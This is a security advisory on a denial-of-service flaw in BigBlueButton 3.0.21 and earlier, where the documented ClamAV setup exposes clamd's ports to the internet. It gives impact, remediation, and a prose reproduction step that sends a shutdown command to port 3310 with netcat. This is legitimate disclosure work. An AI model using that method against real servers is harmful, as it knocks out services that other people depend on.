BigBlueButton ClamAV Integration Denial-of-Service Vulnerability

A denial-of-service vulnerability exists in BigBlueButton versions 3.0.21 and prior, due to improper ClamAV integration. The official documentation allows for ClamAV to be used as a presentation file scanner, but the example provided exposes ClamAV's ports 3310 and 7357 to the internet. This exposure enables remote attackers to send large or complex documents to the ClamAV daemon, clamd, causing resource exhaustion or disrupting the clamd process. Additionally, the documentation warns against exposing these ports, and the default firewall settings do not protect against such exposures in Docker containers. Users who have followed the ClamAV setup instructions from the BigBlueButton documentation are affected.

Impact

Exposing the ClamAV ports to the internet allows for denial-of-service attacks against the BigBlueButton server, by sending large or complex files to clamd, which can exhaust server resources or crash the clamd process. Furthermore, future vulnerabilities in ClamAV could be exploited to manipulate files in the exposed BigBlueButton directory.

Reproduction

To reproduce this vulnerability, follow the ClamAV setup instructions in the BigBlueButton documentation for versions 3.0.21 and below. This will involve running ClamAV as a Docker container with the default settings, which expose the ClamAV ports to the internet. Once the ClamAV service is running and the ports are exposed, the vulnerability can be demonstrated by sending a shutdown command to the ClamAV daemon over the exposed port 3310, using a tool like netcat.

Remediation

Users should update to BigBlueButton version 3.0.22 or later, and follow the revised ClamAV setup instructions available in the BigBlueButton documentation. The updated instructions recommend running the ClamAV container with the ports bound to localhost only, mounting the volume as read-only or not at all, and not running the container as root. After applying these changes, the ClamAV container should be configured to automatically restart after a crash or system reboot.